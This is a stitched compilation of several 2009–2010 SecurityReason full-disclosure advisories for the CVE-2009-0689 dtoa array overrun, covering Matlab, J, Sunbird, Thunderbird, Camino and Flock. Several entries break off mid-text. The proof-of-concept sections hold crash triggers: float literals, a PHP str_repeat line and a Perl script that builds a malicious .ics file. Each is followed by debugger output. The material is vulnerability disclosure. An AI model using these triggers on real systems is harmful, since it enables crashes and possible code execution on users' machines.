[ Matlab R2009b Array Overrun (code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 08.01.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Matlab R2009b NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/80 --- 0.Description --- MATLAB is a numerical computing environment and fourth generation programming language. Developed by The MathWorks, MATLAB allows matrix manipulation, plotting of functions and data, implementation of algorithms, creation of user interfaces, and interfacing with programs in other languages. Although it is numeric only, an optional toolbox uses the MuPAD symbolic engine, allowing access to computer algebra capabilities. An additional package, Simulink, adds graphical multidomain simulation and Model-Based Design for dynamic and embedded systems. In 2004, MathWorks claimed that MATLAB was used by more than one million people across industry and the academic world --- 1. Matlab 2009b Array Overrun (code execution) --- The main problem exist in dtoa implementation. Matlab has the same dtoa as Mozilla, OpenBSD, MacOS, Google, Opera etc. and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- There are several ways to make a successful attack. Simplest assumed the creation of a script with a defective floating-point variable and execution it. This will allow the possibility of code execution. -expl.m-- cxib=0. -expl.m-- MATLAB crash file:C:\DOCUME~1\WinXPae\USTAWI~1\Temp\matlab_crash_dump.552 Segmentation violation detected at Wed Dec 03 12:04:02 2009 Configuration: MATLAB Version: 7.9.0.529 (R2009b) MATLAB License: [PRIV] Operating System: Microsoft Windows XP Window System:Version 5.1 (Build 2600: Dodatek Service Pack 3) Processor ID: x86 Family 6 Model 7 Stepping 6, GenuineIntel Virtual Machine: Java 1.6.0_12-b04 with Sun Microsystems Inc. Java HotSpot(TM) Client VM mixed mode Default Encoding: windows-1250 Fault Count: 1 Register State: EAX = 71c71c71 EBX = 188ade48 ECX = 000a EDX = 188adde0 ESI = 0002 EDI = 0003 EBP = 00c3dec0 ESP = 00c3de90 EIP = 7baf965e FLG = 00010206 Stack Trace: [0] libut.dll:_Balloc(0x188adde0, 0x188ade48, 10, 1) + 14 bytes [1] libut.dll:_s2b(0x188adde0, 33, 33, 0x069f6bc7) + 112 bytes [2] libut.dll:_ut_strtod(0x188adde0, 0x19a80048 "0.11..", 0x00c3e024, 0x00c3e028) + 1123 bytes [3] m_ir.dll:_mps_parse_matlab_real(0x188ad9f0, 0x00c3e068, 11, 0) + 576 bytes [4] m_parser.dll:_mps_convert_M_NUMBER(0x188afb90, 0x1971d070, 0x1971d048, 0x188afb90) + 71 bytes [5] m_parser.dll:_mps_convert_lval(0x188afb90, 0x1971d048, 0x1971d070, 0) + 224 bytes [6] m_parser.dll:_mps_convert_M_Primary_4(0x188afb90, 0x1971d084, 0x1971d0e8, 0x188afb90) + 191 bytes [7] m_parser.dll:_mps_convert_M_Stmt_2(0x188afb90, 0x1971d0d4, 0x1971d0e8, 0x188afb90) + 247 bytes [8] m_parser.dll:_mps_convert_M_Stmts_2(0x188afb90, 0x1971d0e8, 0x188afb90, 0x199d95b0) + 703 bytes [9] m_parser.dll:_mps_make_M_body_from_parse_tree(0x1971d0e8, 0, 37, 0) + 1283 bytes [10] m_parser.dll:_mps_convert_script(0x00c3e788, 18, 0x00c3e550 "đĺĂ", 0x7a36323f) + 1073 bytes [11] m_parser.dll:_mps_convert_M_File_1(0x188afb90, 0x189b3960, 0x188afb90, 0x189b3960) + 66 bytes [12] m_parser.dll:_mps_M_to_IR_eval(0x00c3e7b4, 0x00c3e774, 0x00c3e778, 0x00c3e77c) + 1471 bytes [13] m_parser.dll:_mps_M_to_IR(0x00c3e80f, 0x00c3e7b4, 0x00c3e774, 0x00c3e778) + 307 bytes [14] m_interpreter.dll:public: void __thiscall Mfh_mp::inCompileMfile(char const *)(0x03ba1a86 "C:\Documents And Settings\WinXPa..", 1, 0x1977c300 "¤Ä.z", 0x0085) + 492 bytes [15] m_interpreter.dll:public: void __thiscall Mfh_mp::inCompileMOrLoadPFile(void)(0, 0x7a1459e2, 1, 0x1977c300 "¤Ä.z") + 266 bytes [16] m_interpreter.dll:public: virtual void __thiscall Mlm_mp::load_file(void)(0, 0x1977c300 "¤Ä.z", 0, 0x78134c58) + 32 bytes [17] m_dispatcher.dll:public: void __thiscall Mlm_MATLAB_fn::try_load(void)(0x19728978, 0x78159334, 1, 0x00c3ee54 "ŘďĂ") + 71 bytes [18] m_dispatcher.dll:public: void __thiscall Mlm_MATLAB_fn::load(void)(0, 0x19
[Full-disclosure] J 6.02.023 Array Overrun (code execution)
[ J 6.02.023 Array Overrun (code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2010
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- J 6.02.023 Array Overrun (code execution)
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/79
--- 0.Description ---
The J programming language, developed in the early 1990s by Ken Iverson
and Roger Hui, is a synthesis of APL (also by Iverson) and the FP and FL
function-level languages created by John Backus.
To avoid repeating the APL special character problem, J requires only
the basic ASCII character set, resorting to the use of digraphs formed
using the dot or colon characters to extend the meaning of the basic
characters available. Additionally, to keep parsing and the language
simple, and to compensate for the lack of character variation in ASCII,
J treats many characters which might need to be balanced in other
languages (such as [] {} "" `` or <>) as stand alone tokens or (with
digraphs) treats them as part of a multi-character token.
Being an array programming language, J is very terse and powerful, and
is most suited to mathematical and statistical programming, especially
when performing operations on matrices. J is a MIMD language.
--- 1. J 6.02.023 Array Overrun (code execution) ---
The main problem exist in dtoa implementation. J has the same dtoa as
MatLab, OpenBSD, MacOS, Google, Opera etc.
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it
is possible to call 16<= elements of freelist array.
--- 2. Proof of Concept (PoC) ---
There are several ways to make a successful attack. Simplest assumed the
creation of a script with a defective floating-point variable and
execution it. This will allow the possibility of code execution.
-expl.ijs--
cxib=0.
-expl.ijs--
Program received signal SIGSEGV, Segmentation fault.
0x00452157 in ?? ()
eax0x4c2000 4988928
ecx0x2c667c 2909820
edx0x46d054 4640852
ebx0x48a607 296455
esp0x98f720 0x98f720
ebp0x98f77c 0x98f77c
esi0x436380870662152
edi0x0 0
eip0x452157 0x452157
eflags 0x10206 [ PF IF RF ]
cs 0x1b 27
ss 0x23 35
ds 0x23 35
es 0x23 35
fs 0x3b 59
gs 0x0 0
edi=0
(gdb) x/i $eip
0x452157: test %eax,(%eax)
(gdb) x/x $eax
0x4c2000: 0x
--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J
This list is not yet closed.
--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/li
[Full-disclosure] SecurityReason: Sunbird 0.9 Array Overrun (code execution) 0day
[ Sunbird 0.9 Array Overrun (code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-199 Risk: High Remote: Yes Affected Software: - Sunbird 0.9 NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/77 --- 0.Description --- Mozilla Sunbird is a cross-platform calendar application, built upon Mozilla Toolkit. Our goal is to provide you with a full-featured and easy to use calendar application that you can use around the world. --- 1. Sunbird 0.9 Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Sunbird has the same dtoa as Firefox, etc. Problem exist in js3250.dll (version 4.0.0 - Netscape 32-bit JavaScript Module) DLL library and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- If we use Sunbird to open or import crafted "ics" file, Sunbird will crash. For example --- #!/usr/bin/perl # SecurityReason.com # sp3x # tested on WinXp SP3 my $header = "BEGIN:VCALENDAR\n". "PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n". "VERSION:2.0\n". "BEGIN:VTIMEZONE\n". "TZID:Europe/Prague\n". "X-LIC-LOCATION:Europe/Prague\n". "BEGIN:DAYLIGHT\n". "TZOFFSETFROM:+0100\n". "TZOFFSETTO:+0200\n". "TZNAME:CEST\n". "DTSTART:19700329T02\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n". "END:DAYLIGHT\n". "BEGIN:STANDARD\n". "TZOFFSETFROM:+0200\n". "TZOFFSETTO:+0100\n". "TZNAME:CET\n". "DTSTART:19701025T03\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n". "END:STANDARD\n". "END:VTIMEZONE\n". "BEGIN:VEVENT\n". "CREATED:20091117T095214Z\n". "LAST-MODIFIED:20091117T095217Z\n". "DTSTAMP:20091117T095214Z\n". "UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n"; my $s = "SUMMARY:0."; my $expl = "1" x 296450; my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n". "DTEND;TZID=Europe/Prague:20100111T12\n". "END:VEVENT\n". "END:VCALENDAR\n"; open(myfile,'>>test.ics'); print myfile $header.$s.$expl.$footer; --- 0:000> r eax=015e06f9 ebx=0001 ecx=658cebec edx=0002 esi=015e0710 edi=015e06f9 eip=600f154f esp=0012e330 ebp=0012e35c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010206 js3250!JS_strtod+0xb0a: 600f154f 8b01mov eax,dword ptr [ecx] ds:0023:658cebec= 0:000> ub 600f1551 js3250!JS_strtod+0xaf2: 600f1537 83c414 add esp,14h 600f153a 8b75fc mov esi,dword ptr [ebp-4] 600f153d e96bf5 jmp js3250!JS_strtod+0x68 (600f0aad) 600f1542 56 pushesi 600f1543 57 pushedi 600f1544 8b7c240cmov edi,dword ptr [esp+0Ch] 600f1548 8d0cbd08d01460 lea ecx,js3250!js_XMLClass+0x560 (6014d008)[edi*4] 600f154f 8b01mov eax,dword ptr [ecx] 0:000> !exchain 0012fc9c: USER32!_except_handler3+0 (7e39048f) CRT scope 0, func: USER32!UserCallWinProc+10a (7e39ac2d) 0012fcf4: USER32!_except_handler3+0 (7e39048f) CRT scope 0, filter: USER32!DispatchMessageWorker+113 (7e39074a) func: USER32!DispatchMessageWorker+126 (7e390762) 0012fd5c: sunbird!jpeg_mem_term+eb7 (00849745) 0012ffb0: sunbird!jpeg_fdct_islow+266a4 (00848818) 0012ffe0: kernel32!_except_handler3+0 (7c839ac0) CRT scope 0, filter: kernel32!BaseProcessStart+29 (7c843882) func: kernel32!BaseProcessStart+3a (7c843898) Invalid exception stack at 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0012e35c 600f15f3 js3250!JS_strtod+0xb0a 0012e37c 600f0ef9 js3250!JS_strtod+0xbae 0012e3f4 6010e8eb js3250!JS_strtod+0x4b4 0012e448 6010e3c6 js3250!JSLL_MinInt+0x1dcf 0012e46c 60103fb5 js3250!JSLL_MinInt+0x18aa 0012e5dc 6010195e js3250!js_Invoke+0x2c1b 0012e694 60101cb2 js3250!js_Invoke+0x5c4 0012e71c 60101e0a js3250!js_Invoke+0x918 0012e74c 6011350d js3250!js_Invoke+0xa70 0012e7a4 600e3c41 js3250!js_FindProperty+0x974 0012e7bc 004274cf js3250!JS_SetProperty+0x36 0012e978 0042593e sunbird!NS_RegistryGetFactory+
[Full-disclosure] SecurityReason: Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution)
[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- Thunderbird 2.0.0.23
Fixed in:
- Thunderbird 3.0
- Thunderbird 2.0.0.24pre
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/78
--- 0.Description ---
Thunderbird 2 includes many new features to help you manage your inbox.
With Thunderbird 2, it?s easier to prioritize and find your important
email with tags and the new find bar helps you find content within your
email faster.
Lightning brings the Sunbird calendar to the popular email client,
Mozilla Thunderbird. Since it's an extension, Lightning is tightly
integrated with Thunderbird, allowing it to easily perform email-related
calendaring tasks.
--- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code
execution) ---
The main problem exist in dtoa implementation. Thunderbird has the same
dtoa as Firefox, etc. This problem affects many additional Add-ons for
thunderbird.
Example for affected Add-ons:
- Lightning 0.9
- Thunderbrowse 3.2.6.7
- more
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
--- 2. Proof of Concept (PoC) ---
(PoC for Lightning )
---
#!/usr/bin/perl
# SecurityReason.com
# sp3x
# tested on WinXp SP3
my $header = "BEGIN:VCALENDAR\n".
"PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n".
"VERSION:2.0\n".
"BEGIN:VTIMEZONE\n".
"TZID:Europe/Prague\n".
"X-LIC-LOCATION:Europe/Prague\n".
"BEGIN:DAYLIGHT\n".
"TZOFFSETFROM:+0100\n".
"TZOFFSETTO:+0200\n".
"TZNAME:CEST\n".
"DTSTART:19700329T02\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n".
"END:DAYLIGHT\n".
"BEGIN:STANDARD\n".
"TZOFFSETFROM:+0200\n".
"TZOFFSETTO:+0100\n".
"TZNAME:CET\n".
"DTSTART:19701025T03\n".
"RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n".
"END:STANDARD\n".
"END:VTIMEZONE\n".
"BEGIN:VEVENT\n".
"CREATED:20091117T095214Z\n".
"LAST-MODIFIED:20091117T095217Z\n".
"DTSTAMP:20091117T095214Z\n".
"UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n";
my $s = "SUMMARY:0.";
my $expl = "1" x 296450;
my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T11\n".
"DTEND;TZID=Europe/Prague:20100111T12\n".
"END:VEVENT\n".
"END:VCALENDAR\n";
open(myfile,'>>test.ics');
print myfile $header.$s.$expl.$footer;
---
(PoC for Thunderbrowse )
---
var a=0.<?php echo str_repeat("1",33); ?>;
---
When we use Thunderbrowse to see this site, Thunderbird will crash with:
Program terminated with signal 11, Segmentation fault.
#0 0xbb15d1e7 in ?? ()
eax0x0 0
ecx0xa 10
edx0x0 0
ebx0xbb16eb38 -1156125896
esp0xbfbfce58 0xbfbfce58
ebp0xbfbfce74 0xbfbfce74
esi0xb 11
edi0xb768e700 -1217861888
eip0xbb15d1e7 0xbb15d1e7
eflags 0x282[ SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0xab 171
gs 0xb3 179
(gdb) x/x ($eip)
0xbb15d1e7: Cannot access memory at address 0xbb15d1e7
(gdb) x/x ($esi)
0xb:Cannot access memory at address 0xb
(gdb) x/x ($edi)
0xb768e700: 0x1c71c71c
now esi=0xb and edi=0x1c71c71c
(gdb) x/20x ($edi)
0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
(gdb) x/50x ($edi)+37000
0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0xb76977b8: 0xc71c71c7 0x71
[Full-disclosure] SecurityReason: Camino 1.6.10 Remote Array Overrun (Arbitrary code execution)
[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- Camino 1.6.10
Fixed in:
- Camino 2.0 <=
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/76
--- 0.Description ---
Camino (from the Spanish word camino meaning "way", "path" or "road") is
a free, open source, GUI-based Web browser based on Mozilla's Gecko
layout engine and specifically designed for the Mac OS X operating
system. In place of an XUL-based user interface used by most
Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although
it does not use native text boxes.
--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Camino has the same dtoa
as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
--- 2. Proof of Concept (PoC) ---
---
var a=0.<?php echo str_repeat("1",296450); ?>;
---
Process: Camino [153]
Path:/Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier: org.mozilla.camino
Version: 1.6.10 (1609.09.25)
Code Type: X86 (Native)
Parent Process: launchd [92]
Date/Time: 2009-11-06 12:57:24.698 -0800
OS Version: Mac OS X 10.5.6 (9G55)
Report Version: 6
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x7e33d590
Crashed Thread: 0
Thread 0 Crashed:
0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list
+ 235
1 libSystem.B.dylib 0x01d7710d szone_malloc + 180
2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81
3 libSystem.B.dylib 0x01d76fac malloc + 55
4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220
5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282
6 org.mozilla.camino 0x0038ae0e
nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146
7 org.mozilla.camino 0x0038b215
nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27
8 org.mozilla.camino 0x003afbd0
EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24
9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int
(*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37
10 org.mozilla.camino 0x003b0c77
nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*,
nsStyleContext*, nsICSSPseudoComparator*) + 123
11 org.mozilla.camino 0x002cc924
nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134
12 org.mozilla.camino 0x002f617b
PresShell::InitialReflow(int, int) + 1151
13 org.mozilla.camino 0x005a90d4
nsContentSink::StartLayout(int) + 342
14 org.mozilla.camino 0x00483354
HTMLContentSink::StartLayout() + 82
15 org.mozilla.camino 0x00486cb7
HTMLContentSink::OpenBody(nsIParserNode const&) + 193
16 org.mozilla.camino 0x001a60e8
CNavDTD::OpenBody(nsCParserNode const*) + 54
17 org.mozilla.camino 0x001a8b53
CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393
18 org.mozilla.camino 0x001aa3e5
CNavDTD::HandleStartToken(CToken*) + 623
19 org.mozilla.camino 0x0012
CNavDTD::HandleToken(CToken*, nsIParser*) + 1358
20 org.mozilla.camino 0x001a9a4d
CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*,
nsIContentSink*) + 165
21 org.mozilla.camino 0x001a94ee
CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550
22 org.mozilla.camino 0x001b5e28
nsParser::DidBuildModel(unsigned int) + 90
23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int,
int, int) + 661
24 org.mozilla.camino 0x001b59a8
nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128
25 org.mozilla.camino 0x002076a0
nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned
int) + 88
26 org.mozilla.camino 0x000f522a
nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78
27
[Full-disclosure] SecurityReason: Flock 2.5.2 Remote Array Overrun (Arbitrary code execution)
[ Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- Flock 2.5.2
Fixed in:
- Flock 2.5.5
NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/75
--- 0.Description ---
Flock is a web browser built on Mozilla.s Firefox codebase that
specializes in providing social networking and Web 2.0 facilities built
into its user interface. Flock v2.5 was officially released on May 19, 2009.
The Flock browser is available as a free download, and supports
Microsoft Windows, Mac OS X, and Linux platforms.
--- 1. Flock 2.5.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exist in dtoa implementation. Flock has the same dtoa
as Firefox, SeaMonkey, Chrome, Opera etc.
and it is the same like SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63
but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69
We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.
--- 2. Proof of Concept (PoC) ---
---
var a=0.<?php echo str_repeat("1",296450); ?>;
---
Program received signal SIGSEGV, Segmentation fault.
0x67c68740 in js3250!JS_DHashTableEnumerate ()
from C:\Program Files\Flock\js3250.dll
(gdb) i r
eax0x964619c7 -1773790777
ecx0x2 2
edx0x2 2
ebx0x2 2
esp0x20e7f0 0x20e7f0
ebp0x1 0x1
esi0x299d70043636480
edi0x299d70143636481
eip0x67c68740 0x67c68740
eflags 0x210202 [ IF RF ID ]
cs 0x1b 27
ss 0x23 35
ds 0x23 35
Es 0x23 35
fs 0x3b 59
gs 0x0 0
(gdb) x/i 0x67c68740
0x67c68740 :
mov0x67ce0458(,%edi,4),%eax
(gdb) x/x $eax
0x964619c7: Cannot access memory at address 0x964619c7
--- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
This list is not yet closed.
--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h
OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.or
[Full-disclosure] PHP 5.3.1 open_basedir bypass
